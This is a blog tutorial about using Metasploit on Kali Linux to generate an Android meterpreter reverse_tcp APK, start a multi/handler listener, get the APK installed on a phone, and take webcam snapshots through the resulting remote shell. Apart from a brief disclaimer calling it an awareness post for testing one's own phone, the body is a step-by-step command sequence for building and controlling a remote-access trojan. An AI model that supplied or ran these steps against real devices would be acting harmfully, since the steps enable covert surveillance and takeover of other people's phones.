Android security patch totally fail and full control using Metasploit tool, Kali Linux Distribution (Security test on Android Phones)

Introduction: KALI Linux distribution, Penetration testing, Android Developing, Android Application, Windows Developing & Applications/Software, Description of how to use android/windows applications, all kinds of IT-related problems & solutions hub it is. It is a growing learning spot of a fresh techy mind.

Install Kali Linux on your android smartphone or computer. to know how to install kali Linux on an android phone, search on YouTube "how to install kali Linux in an android smartphone" NOTE: your phone must be rooted.
*Install/run Kali Linux on your computer using virtual box: https://bit.ly/3iAI2Tr

1. Open Kali Linux on your android phone or computer.
then open the root terminal.
2. type su (enter)  *(if su command is not working then try sudo in front of each command)
after typing, <su password>. ( now you will face a su password problem. do not worry, you can simply change the su password as u like, search on YouTube " how to change su/root password in kali Linux on android), type a command ifconfig (enter) to know the IP address of the system. (example: 198.168.0.1)

3. Now, type the command :

msfpayload android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=0000 R>andro.apk (enter)

wait until it's done.
( LHOST=0.0.0.0 means your IP address, like LHOST=10.1.198.20 and port like 4444, 8888, 8080 whatever you like. to know your IP.

4. now type a command: 

msfconsole (enter)

wait until its opens.




5. now type all these commands, one after one.

search multi/handler (enter)   (wait some time)

use exploit/multi/handler (enter)

set PAYLOAD android/meterpreter/reverse_tcp (enter)

set LHOST 0.0.0.0 (enter)

set LPORT 0000 (enter)

exploit (enter)

Now open file manager on Kali Linux, open it, go to home dictionary, you will see an apk file has been created. share the apk file in an android system and install it.

After installing the app, you will see a " meterpreter>> " session has started.

then type  "    (enter) "
now you will see all commands.

*after type

webcam_snap (enter)

wait , after some time if a window comes with a picture then your phone has poor security system ( like, samsung galaxy j7 Prime, tested) and

If shows ERROR in the terminal  , then your phone has a quite good security system (like, xiaomi redmi note 3 , tested)

[ Note: do it at your own risk. I did this test on my phone.  if your phone gets wrong then I will not responsible for it. the apk file shares only your phone, not other android phones. if you do this, then it will be illegal. it's an awareness post. and do not misuse my post. ]


Youtube : https://youtube.com/aioyc

Blog : https://aioyc01.blogspot.com

Website : https://aioyc.wordpress.com

Previous Post Next Post